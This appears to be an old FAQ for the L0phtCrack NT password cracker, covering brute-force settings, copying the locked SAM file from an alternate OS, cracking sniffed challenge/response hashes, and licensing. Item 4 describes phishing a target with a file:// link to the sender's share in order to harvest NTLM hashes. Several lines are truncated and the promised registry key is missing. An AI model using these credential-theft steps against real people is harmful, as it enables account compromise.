1. Can I use a custom character set for brute forcing?
Yes. Just enter the character set you want into the Tools Options dialog
box in the Character Set field. It will be saved with the file you are
cracking if you decide to stop and start cracking.
2. How do I get the SAM file? It seems locked.
The SAM file in \winnt\system32\config is locked by the OS so that it
cannot be read while NT is running. In order to read this file you will
need to boot an alternate operating system such as Linux or DOS. Usually
this file will be on an NTFS partition. Linux can read NTFS natively but
DOS will need a special program to access the partition. Go to
www.sysinternals.com and download NTFSDOS. It will allow you to boot off
a DOS floppy, run NTFSDOS, and copy files from an NTFS partition. You
can now copy the SAM file and bring it to the machine running l0phtcrack
to be imported.
Cracking sniffer dumps seems to take a long time. Is this right?
Cracking the captured challenge/response hashes from a network capture
takes a bit longer for one password than its counterpart gotten from a
registry dump. The big slowdown with the network capture cracking is that
each hash is encrypted with a unique challenge so that the work done
cracking one password cannot be used again to crack another. This means
that the time to completion scales linearly as you add password hashes to
10 network challenge/response hashes will take 10 times longer to crack
than just one. Ouch, that could take a long time. This type of cracking
really needs to be targetted towards particular passwords to be
effective. We estimate network challenge/response cracking to take 10
times longer than normal password hash cracking.
3. I get "cannot open network device or do not have sufficient
privileges to install packet driver."
You need to have administrator privileges to do network sniffing. Or at
least you have to have an administrator run l0phtcrack and choose SMB
Network Capture once to have the packet driver installed.
4. I am on a switched network and can't capture anyone elses password
hashes. Am I out of luck?
No. You just have to make the hashes come to you. Send out an email to
your target, whether it is an individual or a whole company. Include in
it a URL in the form of
file:////yourcomputer/sharename/message.html. When people click on that
they will be sending their password hashes to you for authentication.
5. I am using an international version of NT and L0phtCrack crashes,
hangs, produces an error, fails to crack my password etc. What am I doing
This is mentioned in the Read Me file but we still get this question a
lot. If you use a non-english language version of NT you will need to
modify the registry with regedit so that you can you dump the password
hashes from the registry. The registry key to modify is:
The default is "administrators". Change this to your language version for
the administrators group.
6. I would like to move my license to a new machine but the unlock
code does not work on the new system. What do I do?
I have had to reinstall all of my software and now my unlock code does
not work. What do I do?
The serial number/unlock code pair are machine specific and will vary
from system to system. To move your license from one machine to another
follow these steps.
1. Delete your copy of L0phtCrack from the old system.
2. Download and install a new copy onto the new machine.
3. Email us with the new serial number and your cutomer ID code.
4. We will email you the appropriate unlock code.
7. I tried to use L0phtCrack on my AOL, Hotmail, ISP, MS Word,
FileMaker Pro, etc. etc... password but it didn't work. What am I doing
(You would be surprised how often we get asked this.) L0phtCrack is for
auditing Windows NT passwords only. The current version does not work on
any other types passwords. Due to the increased demand for this sort of
functionality we may ad these features in the future, so keep checking
8. Is L0phtCrack Y2K compliant?
L0phtCrack does not use any time or date specific funtions. Therefore,
as long as the underlying operating system is compliant so is
9. I keep getting NULL Passwords in the cracked password file. I
know these accounts have passwords why is L0phtCrack showing them as
Machine accounts that cannot be used for login have NULL passwords.
User accounts that last had their password changed under MacOS,
Novell, WinFrame, etc... will have NULL NT passwords.